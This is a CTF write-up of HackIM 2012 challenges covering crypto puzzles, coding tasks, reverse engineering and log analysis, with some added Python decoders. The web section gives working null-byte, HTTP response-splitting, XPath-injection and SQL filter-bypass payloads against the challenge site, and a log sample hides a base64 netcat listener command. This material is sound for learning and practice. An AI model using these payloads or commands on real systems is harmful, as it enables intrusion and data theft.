HackIM – danny

HackIM 2012 Write-up by Dhanesh 'danny' K
Trivia: As the name suggests, it's all about seek n destroy :P
Trivia 1:
Q. This operating system also refers to a 1982 science fiction film, a board game, and a song off the
Prodigy B-Side "What Evil Lurks"
A. Android
Trivia 2:
Q. This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying
packets with malicious intent.
A. evil bit
Trivia 3:
Q. This humorous RFC of the Internet Engineering Task Force describes a communication and control
protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of
typewriters to produce the entire works of William Shakespeare.
A. RFC 2795
Trivia 4:
Q. Metasploit was originally coded for what purpose?
A. game
Trivia 5:
Q. Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to
compose commands.
A. whitespace
CRYPTO: We will mess with different algos and bang our heads against messages which don't make any sense :D
Crypto 1:
Q. Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx
iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa
Glyik
A. Windows 2000 already contains features such as the human discipline component, where the PC
can send an electric shock through the keyboard if the human does something that does not please
Windows. - Bill Gates
How to: Open the HTML source and you can see a commented HTML tag which points to a mirrored keyboard. The whole idea here is to map the keyboard in a different manner, in this case mapping the keys on the left-hand side of the keyboard to the right-hand side of the keyboard.
Example: 0 is the 4th key from the right-hand side of the keyboard, so we map it to the 4th key from the left-hand side of the keyboard, which is 3.
Keep applying the same procedure to every character and you get the decrypted text.
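The mirrored-keyboard mapping described above, as an added Python example (not code from the write-up). It assumes the four physical rows 1234567890-=, qwertyuiop, asdfghjkl and zxcvbnm; with that number row '0' mirrors to '3' and '-' to '2', which reproduces the write-up's own example.

```python
# Mirrored-keyboard decoder for HackIM 2012 Crypto 1 (added example, not from the write-up).
# Each physical row is mirrored: the k-th key from the left swaps with the k-th key
# from the right. Letters keep their case; characters on no mapped row (space,
# punctuation) pass through unchanged.

# Row strings are an assumption: the number row is taken as "1234567890-=" so that
# '0' <-> '3' and '-' <-> '2', matching the write-up's hint.
KEYBOARD_ROWS = ["1234567890-=", "qwertyuiop", "asdfghjkl", "zxcvbnm"]


def build_mirror_map(rows=KEYBOARD_ROWS):
    """Map every key of every row to the key at the mirrored position."""
    mapping = {}
    for row in rows:
        n = len(row)
        for i, key in enumerate(row):
            mapping[key] = row[n - 1 - i]
    return mapping


MIRROR = build_mirror_map()


def mirror_decode(text):
    """Decode a mirrored-keyboard text (the map is an involution, so this also encodes)."""
    out = []
    for ch in text:
        low = ch.lower()
        if low in MIRROR:
            mapped = MIRROR[low]
            out.append(mapped.upper() if ch.isupper() else mapped)
        else:
            out.append(ch)
    return "".join(out)


# Ciphertext as quoted in the write-up, joined onto one line.
CIPHERTEXT = (
    "Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi "
    "bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj "
    "eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa Glyik"
)

if __name__ == "__main__":
    print(mirror_decode(CIPHERTEXT))
```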
Crypto 2:
Q. White noise
A. Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your
Previous 30689 Passwords - MS KB 276304
How to: The given document contains spaces and tabs, so you can easily guess that there are only two states and deduce that it is binary. Replace each space with 1 and each tab with 0 and you get a long binary string. Take it 8 bits at a time and convert to hex/ASCII to get the final string.
Crypto 3:
Q. Base test
A. duoTriGeSimalandNgiti
How to: From the page source you get the encoded text
5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ
From the look of the text you can assume it is either base32 or base36. Trying it with the decoders, it is base32 but the text is reversed. So you have to reverse the given text and feed it to a base32 decoder, which gives you yet another base32-encoded text. Decoding that one gives you the final flag.
http://en.wikipedia.org/wiki/Base32, http://sourceforge.net/projects/cyoencode/
Crypto 4:
Q. Elucidate
A. onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena
How to: The given text is a PHP script, encoded/obfuscated. The methodology used to understand the script is to replace each eval with an echo so that we get the intermediate results. A first look at the PHP shows a base64-encoded text which is decoded and eval'ed, so we decode the base64 text to find the next part. The next part is again obfuscated, with weird variable names and hex+octal-encoded strings. It is a repetitive job to decode the hex+octal-encoded strings and substitute the variables to finally get a base64-encoded, gzip-compressed PHP script. After base64 decoding and gzip inflating, we are presented with code which does some kind of zip file creation and an unused variable which holds a hex+octal-encoded string. Echoing that string gives you the final flag.
<?php
// the escaped string was wrapped across lines in the write-up; concatenated here at escape boundaries
$x = "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156"
   . "\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157"
   . "\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165"
   . "\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151"
   . "\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143"
   . "\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";
echo $x;
?>
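The hex+octal escapes of that final stage decoded with an added Python example (not the write-up's code): a small parser for PHP double-quoted string escapes, applied to the $x literal above.

```python
import re

# Decoder for PHP double-quoted string escapes (added example, not the write-up's code).
# Handles the two forms the obfuscated script uses, \xHH (1-2 hex digits) and
# \NNN (1-3 octal digits), plus the common simple escapes. An unknown escape is
# left as-is, which is also what PHP does.
SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f",
                  "\\": "\\", "$": "$", '"': '"'}
ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|.)", re.DOTALL)


def _expand(match):
    body = match.group(1)
    if body[0] == "x" and len(body) > 1:
        return chr(int(body[1:], 16))
    if body[0] in "01234567":
        return chr(int(body, 8) & 0xFF)      # PHP silently wraps octal values above 255
    return SIMPLE_ESCAPES.get(body, match.group(0))


def php_unescape(literal):
    """Expand the escape sequences of a PHP double-quoted string body."""
    return ESCAPE_RE.sub(_expand, literal)


# The $x literal from the script's final stage, joined back onto one line (raw strings keep the backslashes).
OBFUSCATED = (
    r"\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156"
    r"\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157"
    r"\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165"
    r"\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151"
    r"\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143"
    r"\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"
)

if __name__ == "__main__":
    print(php_unescape(OBFUSCATED))
```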
Crypto 5:
Q. Llun Saving Bank is fed up with known encryption standards to store the data. They decided to
reinvent the wheel. Can you decode the data?
A. Learn howto Hide in Plain Sight
How to: Looking at the page source you will find the hidden text. I spent a considerable amount of time analyzing it and finally got a hint that it's steganography. Considering the usual methodologies like LSB modification, I wrote a script to dump the LSB of each character and convert it into a string to get the flag.
C# code for it:
private void btnDo_Click(object sender, EventArgs e)
{
    // carrier text copied from the page source (wrapped across lines in the write-up, joined here)
    string str = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd";
    string temp = string.Empty;
    string flag = string.Empty;
    for (int i = 0; i < str.Length; i++)
    {
        temp += (str[i] & 1).ToString();   // least significant bit of each character
        if (temp.Length % 8 == 0)
        {
            // every 8 collected bits form one character of the flag
            flag += Convert.ToChar(Convert.ToInt32(temp, 2)).ToString();
            temp = string.Empty;
        }
    }
    MessageBox.Show(flag);
}
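An added Python example (not the write-up's code) covering both bit-per-character puzzles, Crypto 2 (spaces and tabs as binary) and Crypto 5 (LSB of each character), with one shared bits-to-text routine. The whitespace document is not reproduced in the write-up, so a constructed sample is encoded inline; the Crypto 5 carrier is the string from the C# above.

```python
# Bit-stream decoders for HackIM 2012 Crypto 2 and Crypto 5 (added example, not the
# write-up's code). Both puzzles hide one bit per character; only the rule for
# reading the bit differs.

def bits_to_text(bits):
    """Pack a string of '0'/'1' into ASCII, 8 bits per character, MSB first.
    Trailing bits that do not fill a byte are ignored."""
    chars = []
    for i in range(0, len(bits) - len(bits) % 8, 8):
        chars.append(chr(int(bits[i:i + 8], 2)))
    return "".join(chars)


def decode_whitespace(doc, one=" ", zero="\t"):
    """Crypto 2: spaces are 1s, tabs are 0s; every other character is ignored."""
    bits = "".join("1" if c == one else "0" for c in doc if c in (one, zero))
    return bits_to_text(bits)


def decode_lsb(carrier):
    """Crypto 5: the least significant bit of each character's code point."""
    bits = "".join(str(ord(c) & 1) for c in carrier)
    return bits_to_text(bits)


def encode_whitespace(text, one=" ", zero="\t"):
    """Builds a whitespace carrier; only used here to construct the Crypto 2 sample."""
    return "".join(one if b == "1" else zero
                   for c in text for b in format(ord(c), "08b"))


# Constructed sample for Crypto 2 (the challenge document is not in the write-up).
WHITESPACE_DOC = encode_whitespace("MS KB 276304")

# The Crypto 5 carrier text from the page source, as quoted in the write-up (joined onto one line).
STEGO_TEXT = (
    "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU "
    "Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme "
    "and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor "
    "Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd"
)

if __name__ == "__main__":
    print(decode_whitespace(WHITESPACE_DOC))
    print(decode_lsb(STEGO_TEXT))
```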
Programming: Write code bud, write code!!
Programming 1:
Q. Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw
vawwhnwer, pcum nu oeq ewllxqmqit
A. Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in
ourselves, that we are underlings
How to: From the page source we know that the original text begins with 'Men at'. From this hint it's very obvious that the position value has been added to each character of the given text. Consider the text to start at index 0; then it is 'M' + 0, 'e' + 1 and so on, adding the index value. To solve this I didn't write any code. I did it manually up to 'Men at some', googled that part of the text and got the original text from Julius Caesar.
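The index-shift cipher as described, as an added Python example (not the write-up's code). A plain position shift matches the ciphertext for its first 27 characters (through 'master'); beyond that the write-up's ciphertext no longer follows a plain index shift, which is why the author finished by searching for the quote, so the check below covers only that prefix.

```python
# Index-shift cipher for HackIM 2012 Programming 1 (added example, not the write-up's code).

def index_shift(text, decode=True):
    """Shift each ASCII letter by its 0-based position (subtracting when decoding), mod 26.
    Spaces and punctuation occupy a position but are left unchanged."""
    out = []
    for i, ch in enumerate(text):
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = -i if decode else i
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


# Ciphertext as quoted in the write-up, joined onto one line.
CIPHERTEXT = ("Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, "
              "zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit")

if __name__ == "__main__":
    print(index_shift(CIPHERTEXT))
```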
Programming 2:
Q. The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
A. 43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497
How to: Nothing much to think about, just go ahead and write code to print out Pascal's triangle and modify it to find the sum of the middle terms. The issue when you are coding in C/C++/C# is that after a couple of additions you hit the integer (32- or 64-bit) limit. I am not a script kiddie (:P), so I used a BigInteger library for C#. It is very slow compared to crypto-grade BigInt libraries, but yeah, it does work.
Lib: http://www.codeproject.com/Articles/36323/BigInt
C# code:
static void Main(string[] args)
{
    int p = 1337;                       // number of rows
    int q = 0;                          // current (even) row index
    int x;
    BigInt sum = BigInt.Parse("0");
    BigInt binom = BigInt.Parse("0");
    while (q < p)
    {
        for (x = 0; x <= q; ++x)
        {
            // build C(q, x) incrementally from C(q, x - 1)
            if ((x == 0) || (q == 0))
                binom = 1;
            else
                binom = (binom * (q - x + 1)) / x;
            if (x == q / 2)
            {
                sum += binom;           // the single middle term of an even row
                break;
            }
        }
        q = q + 2;                      // odd rows have no single middle term
    }
    Console.WriteLine(sum);
    Console.ReadLine();
}
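The same sum in Python, which has arbitrary-precision integers built in, as an added example (not the write-up's code); it takes the single middle term of each even row below row 1337, exactly as the C# above does.

```python
# HackIM 2012 Programming 2 without a BigInt library (added example, not the write-up's code).
# The C# loops over even rows 0, 2, ..., 1336 and adds C(q, q/2) for each; odd rows
# have two middle terms and are skipped, so the sum is C(0,0) + C(2,1) + ... + C(1336,668).

def middle_term_sum(rows):
    """Sum of the central binomial coefficient of every even row index below `rows`."""
    total = 0
    binom = 1                      # C(0, 0)
    for k in range(0, rows, 2):    # k = row index; its middle term is C(k, k // 2)
        if k:
            # C(k, k/2) from C(k-2, k/2-1): multiply by k(k-1), divide by (k/2)^2 (exact)
            half = k // 2
            binom = binom * k * (k - 1) // (half * half)
        total += binom
    return total


if __name__ == "__main__":
    answer = middle_term_sum(1337)
    print(len(str(answer)), "digits")
    print(answer)
```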
Programming 3:
Q. Your Brainfuck Sir ...
A. ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..
How to: The given code is Brainfuck-interpretable. The first thing I did was to run it in an emulator (you can get a couple of them online, or you can convert it to a C representation and run that). The thing to notice here is how well the BF code is formatted. Most of the time BF code is just a single line without any line breaks. This suspicion made me put the output function of BF (.) after every line, which printed most of the flag. I had to put a couple of dots at the start and end to make it the real flag.
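A Brainfuck runner with the line-end-dot trick, as an added Python example (not the write-up's code). The challenge program is not reproduced in the write-up, so a constructed three-line program that computes one character per line without ever printing stands in for it.

```python
# Brainfuck runner for HackIM 2012 Programming 3 (added example, not the write-up's code).
# dot_every_line() applies the write-up's trick: append '.' to each line of a
# line-broken program so that whatever a line has just computed gets printed.

def run_bf(program, input_bytes=b""):
    """Minimal Brainfuck interpreter with precomputed bracket matching."""
    code = [c for c in program if c in "<>+-.,[]"]      # everything else is a comment
    jump, stack = {}, []
    for pos, c in enumerate(code):
        if c == "[":
            stack.append(pos)
        elif c == "]":
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError("unbalanced brackets")
    tape, ptr, pc = [0] * 30000, 0, 0
    inp, out = list(input_bytes), bytearray()
    while pc < len(code):
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return bytes(out)


def dot_every_line(program):
    """Append '.' to every non-empty line, exposing each line's result as output."""
    return "\n".join(line + "." if line.strip() else line
                     for line in program.splitlines())


# Constructed stand-in for the challenge program: each line builds one character
# (72 'H', 66 'B', 77 'M') in a fresh cell and leaves the pointer on it; no line prints.
SILENT_PROGRAM = """\
++++++++[>+++++++++<-]>
>++++++[>+++++++++++<-]>
>+++++++[>+++++++++++<-]>
"""

if __name__ == "__main__":
    print(repr(run_bf(SILENT_PROGRAM)))                  # b''
    print(repr(run_bf(dot_every_line(SILENT_PROGRAM))))  # b'HBM'
```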
Programming 4:
Q. Substitute Problem
A. sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
How to: The given instructions are self-explanatory. All you need is to code accordingly.
C# code:
private int SearchInNumbers(string s, string[] numbers)
{
    // index of the spelled-out number s in numbers, or -1 if it is not there
    for (int i = 0; i < numbers.Length; i++)
    {
        if (numbers[i] == s)
            return i;
    }
    return -1;
}

public void somelevel()
{
    string inp = rchIn.Text; // input from rich text box
    string[] inl = inp.Split(' ');
    string[] search = { " ", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
        "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" };
    string[] numbers = { "zero", "one", "two", "three", "four", "five", "six",
        "seven", "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fourteen", "fifteen",
        "sixteen", "seventeen", "eighteen", "nineteen", "twenty", "twentyone", "twentytwo",
        "twentythree", "twentyfour", "twentyfive", "twentysix" };
    string temp = string.Empty;
    string final = string.Empty;
    foreach (string val in inl)
    {
        if (val != "00")
        {
            // each two-digit group 01..26 is a letter a..z
            char v = (char)(Convert.ToInt32(val) + 'a' - 1);
            temp += v.ToString();
        }
        else
        {
            // "00" ends a spelled-out number; map it to the letter at that position
            int indx = SearchInNumbers(temp, numbers);
            if (indx < 0)
            {
                MessageBox.Show(temp); // fcuk!! not a number word
            }
            else
            {
                final += search[indx];
            }
            temp = string.Empty;
        }
    }
    int ind = SearchInNumbers(temp, numbers);
    if (ind >= 0)
        final += search[ind];
    string[] arr = final.Split(' ');
    string ans = string.Empty;
    foreach (string sar in arr)
    {
        ind = SearchInNumbers(sar, numbers);
        if (ind < 0)
        {
            ans += "\"" + sar + "\""; // I am lazy for integers :p
        }
        else
        {
            ans += search[ind];
        }
    }
    rchOut.Text = ans; // flag
}
Programming 5:
Q. A pinch of salt for your coffee, Sir?
A. b77313
How to: Get the hash for small data like '1' or 'a'. After that, use your favourite MD5 cracker to get the salt. Note that the salt is different for each user. I used barswf to brute-force the salt successfully.
Web: So you think you know how the WWW work, eh?
Web 1:
Q. Can you view the bytes in password.asp from Me?
A. To get to the next level you have to use this URL:
http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
More on it: http://projects.webappsec.org/w/page/13246949/Null%20Byte%20Injection
Web 2:
Q. Can you redirect ME to hackim.null.co.in?
A. http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%%20%0D%0AContentLength%3A%200%0A%0AHTTP/1.1%20302%20Moved%20Temporarily%0ALocation%3Ahackim.null.co.in%0A HTTP/1.1
How to: The idea here is to redirect to another page via response splitting.
More on it: https://www.owasp.org/index.php/HTTP_Response_Splitting
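The splitting payload from the answer above, seen from the defender's side in an added Python example (not the write-up's code): the page parameter is decoded to expose the embedded CR/LF, a naive header builder shows how a second response appears in the stream, and a hardened builder rejects control characters in header values. The two builders are stand-ins for the challenge's ASP page, which is not reproduced.

```python
from urllib.parse import unquote

# HTTP response splitting, defender's view, for HackIM 2012 Web 2 (added example,
# not the write-up's code).

# The page parameter from the write-up's Web 2 URL, still percent-encoded.
PAYLOAD = ("%%20%0D%0AContentLength%3A%200%0A%0AHTTP/1.1%20302%20Moved%20Temporarily"
           "%0ALocation%3Ahackim.null.co.in%0A HTTP/1.1")


def decode_payload(encoded):
    """Percent-decode a query value the way the server does before using it."""
    return unquote(encoded)


def build_redirect_naive(page):
    """Vulnerable stand-in for the challenge page: the value goes straight into a header."""
    return "HTTP/1.1 302 Found\r\nLocation: " + page + "\r\n\r\n"


def build_redirect_safe(page):
    """Hardened version: refuse CR, LF and every other control character in a header value."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in page):
        raise ValueError("control character in header value")
    return "HTTP/1.1 302 Found\r\nLocation: " + page + "\r\n\r\n"


def count_status_lines(raw_response):
    """Number of HTTP status lines a proxy or browser could see in this byte stream."""
    lines = raw_response.replace("\r\n", "\n").split("\n")
    return sum(1 for line in lines if line.startswith("HTTP/1.1 "))


if __name__ == "__main__":
    page = decode_payload(PAYLOAD)
    print(repr(page))
    print(count_status_lines(build_redirect_naive(page)), "status lines in the naive response")
    try:
        build_redirect_safe(page)
    except ValueError as err:
        print("hardened builder rejected the value:", err)
```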
Web 3:
Q. Login System
A. b3149ecea4628efd23d2f86e5a723472
How to: Register an account and look at the output in the source viewer. You can see the part admin:no. Our idea is to make a user with admin:yes. Logging in with that user gives us the flag.
Web 4:
Q. Can You Get Me all the Data?
A. myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear
How to: The given list is all the Presidents of India. After trying a couple of things with SQL injection, it shows all the content. It is an injection, but an XPath injection. There are multiple ways to actually get the flag out of this level. The injection I used is something like this: '] | /* | /a[b='
Web 5:
Q. Do You Have What IT Takes to Break into the World's Most Secure Login System?
A. 47c1b025fa18ea96c33fbb6718688c0f
How to: Basic SQLi gives you errors like 'hacking attempt is detected'. To bypass the check/filter, you need some special kind of input like this: '<>'1
More on it: http://www.exploit-db.com/papers/18263/
Reverse Engineering: Think in reverse, you must!
RE 1:
Q. Basic Test
A. We could talk all day about what AutoHotKey can do for an online poker player
How to: Initial analysis of the downloaded exe showed that it's a compiled AutoHotKey script. You just need the reversing application, which is readily available here:
http://www.autohotkey.com/download/Exe2Ahk.exe
You get the .ahk file and can see the flag there.
RE 2:
Q. Ask nicely, it will give you what you want
A. AreYouHappyNow?
How to: Initially everyone was stuck at this level, as nothing was interesting in the exe until the hint about the resource section came. The idea is to change EIP to the start of .rsrc and make sure that the section is RWE (I was stuck here as by default the section was not writable). It has self-modifying code, which decrypts the rest of the code and shows the flag's memory in EAX after the final decryption.
A couple of things learned: a new get-base-address trick (other than call $+5 / pop ebp):
http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC
RE 3:
Q. null Mobile Android App
A. Do not let what you cannot do interfere with what you can do.
How to: Started by disassembling with smali and dex2jar, only to find out that there is nothing interesting in the code. The next thing to do is to unpack the apk file (which essentially is a zip file) and look at the folder structure. The hidden JavaScript and PHP files are in \res\raw. After opening the PHP file I found a packed JavaScript snippet, which upon deobfuscation gave the flag in the function mikcah.
http://jsbeautifier.org
RE 4:
Q. Script2
A. Nature has neither kernel nor shell; she is everything at once
How to: This one made me do and understand a lot of gdb. I always avoided doing any no-code Linux debugging as I am not a great fan of text-based debuggers, since the level of info a GUI-based debugger provides is enormous (GDB is very powerful, but the lack of a good GUI is a real pity). Worry not, we have other ways to do it ;)
The given file is an x64 ELF binary, so you need an x64 Linux distro with gdb. After the initial check, I loaded it into IDA64 and disassembled it to get a look at the functionality. Going through the code, you can understand the decryption function it calls regularly to get the hidden text and info out of the executable. Initial debugging gave me the first check, which checks for a particular date and time and says it's expired if the current date and time is past the hard-coded value (again stored in encrypted format). The decrypted value is in epoch time format. Change the system date and you will be greeted with a cat command being executed. At this point the only thing you need to do is run ltrace on script2 with -r and -S 100 to list all the calls, and in the calls you will find the flag.
After finishing the challenge, I set out to dig a little deeper with GDB. Installed gdbserver and attached to it from IDA to do remote debugging from my Windows machine. And guess what, it's just AWESOME.
See the results here...
RE 5:
Q. Got Dumped :(
A. TheLastSamurai
How to: The given file is a Windows XP SP3 memory dump. You can load it into WinDbg with the needed symbols and run !analyze -v to get the initial info about the crash. It's essentially crashing by accessing 0xdeadbabe, which is push/ret'ed to from the code. Now we need the crashing application, which can be obtained in 2 ways, one easy and the other hard.
Easy way to get stub.exe out of dmp file:
Using SOS, which is useful for managed (.NET) debugging. Use these commands to dump all the exes and dlls which were loaded at the time of dump file creation.
.load clr10\sos.dll
!sam folder_path
Now you have a proper stub.exe.
Hard way to get stub.exe out of dmp file:
Open the dmp file in a hex editor and search for PE/MZ. You will eventually find stub.exe's location; copy and paste a large amount of hex into another file. Now open the new file in any PE editor like CFF Explorer to see the section sizes, and remember that when an exe is loaded into memory it is laid out by virtual size, so there will be extra padding. You can manually copy and paste the sections according to the raw size specified in the header to finally get a proper exe out of the dmp file.
After getting stub.exe you can load it into IDA to find the crashing function, which is supposed to decrypt the string in memory and show it via a message box. You can see a lot of crashing code like push 0xdeadbabe / ret, and others like that. After the encrypted message is loaded into registers, you can directly bypass the execution by changing EIP to the decryption routine, which starts with xor esi, esi followed by the GetCurrentProcess and GetProcessID calls. Please note that it was supposed to decrypt the strings from the crashed instance, so when it calls GetProcessID it should return the PID of the crashed application. The PID of the crashed application can be retrieved from WinDbg (either by looking through the PEB or just looking at the status bar of WinDbg :P) as 0xA60. The dumped stub.exe is not in a fully fixed state, so when you load it into the debugger and break at the EP, change EIP to the decryption function, bypass the crashing code and patch GetProcessID to return 0xA60. Then it decrypts the flag and presents you with it.
Log Analysis: It's just a lot of data :/
LA 1:
Q. Basic
A. 6bb61e3b7bce0931da574d19d1d82c88
How to: From the report it is easily visible:
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/
Going to that directory, it lists 2 files. AskMelater.asp seems interesting, and right-clicking and saving it to a file gives us the format to get the flag.
http://www.nullcon.net/challenge/logically_insane/askmelater.asp?question=flag
LA 2:
Q. Mystery Password
A. ..Supp@..adm1n
How to: Given is a pcap file that you can open in Wireshark and look into. It's pretty straightforward.
LA 3:
Q. Clever Intruder
A. contact.php 6666 192.168.0.107
How to: Used Kiwi Log Viewer to filter based on the source IP and found the necessary info in the last entry. contact.php is getting the command in base64-encoded form, and if you decode it you see the netcat command and the port.
LA 4:
Q. Exploited!!!
A. CVE-2005-1921
How to: From the log it's fairly clear that we are attacking TikiWiki. The initial idea was to get all the CVE ids associated with TikiWiki and try them, but that eventually ended in frustration as it didn't find the flag. The next idea was to look at the HTTP response codes: there were a lot of 404s and we are interested only in the 200s. It was fairly easy to find the few 200s among all that junk data.
It was a command execution vulnerability in PEAR XML-RPC, which was found to have the id CVE-2005-1921.
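Log triage for LA 3 and LA 4 in one added Python example (not the write-up's code): parse combined-format access-log lines, keep only the status-200 requests from one source IP, and decode base64 query parameters. The log lines are constructed for this example; the challenge logs are not reproduced in the write-up.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Access-log triage for HackIM 2012 LA 3 and LA 4 (added example, not the write-up's code).
# Apache combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)')

# Constructed sample lines (the challenge logs are not in the write-up); 10.0.0.5 is the suspect source.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jan/2012:10:01:02 +0530] "GET /tiki/tiki-index.php HTTP/1.1" 200 5120
10.0.0.5 - - [14/Jan/2012:10:01:09 +0530] "GET /tiki/admin/backup.php HTTP/1.1" 404 210
10.0.0.5 - - [14/Jan/2012:10:01:15 +0530] "GET /tiki/tiki-old.php HTTP/1.1" 404 210
10.0.0.5 - - [14/Jan/2012:10:02:40 +0530] "POST /tiki/xmlrpc.php HTTP/1.1" 200 312
10.0.0.5 - - [14/Jan/2012:10:03:01 +0530] "GET /contact.php?cmd=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 200 44
192.168.0.20 - - [14/Jan/2012:10:03:30 +0530] "GET /index.php HTTP/1.1" 200 1200
"""


def parse_log(text):
    """Yield one dict per well-formed line; anything that does not parse is skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def filter_status(text, status="200", source_ip=None):
    """Requests that answered with the given status, optionally from one source IP only."""
    return [e for e in parse_log(text)
            if e["status"] == status and (source_ip is None or e["ip"] == source_ip)]


def decode_b64_params(path):
    """{param: decoded text} for query values that are valid base64 of printable ASCII."""
    found = {}
    for key, values in parse_qs(urlsplit(path).query).items():
        for value in values:
            try:
                text = base64.b64decode(value, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue          # not base64, or not text: leave it alone
            if text.isprintable():
                found[key] = text
    return found


if __name__ == "__main__":
    for entry in filter_status(SAMPLE_LOG, source_ip="10.0.0.5"):
        print(entry["time"], entry["method"], entry["path"], decode_b64_params(entry["path"]))
```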
LA 5:
Q. Waat Laga Server
A. id
page
Tavis Ormandy Julien Tinnes
zuzana
How to: That's a huge file!!! The first thing I did was to run strings on that file, which again made a 26.3 MB file, and search around for the required vulnerabilities. Searching for different commands and jargon like root, shell, /bin/sh, system, CVE, exploit reveals a lot of information about the last two flags. For the first two flags one can look into the GET and POST requests which have response 200 and figure out the vulnerabilities.
For finding the root password, you have to use a hash cracker like John the Ripper.
Forensics: Have you covered the tracks?
FL 1:
Q. Tum Agar Dhyan Se Baat Meri Suno
A. 12344346765
How to: As the question says, listen carefully. You notice the sound difference in some places. The best way to analyze a sound issue is to use a tool like Audacity and listen to the irregular places carefully (slow motion :D). After listening you will understand that the sound is reversed in those places which were speaking the flag numbers.
FL 2:
Q. Andar Ch0r
A. 6924289
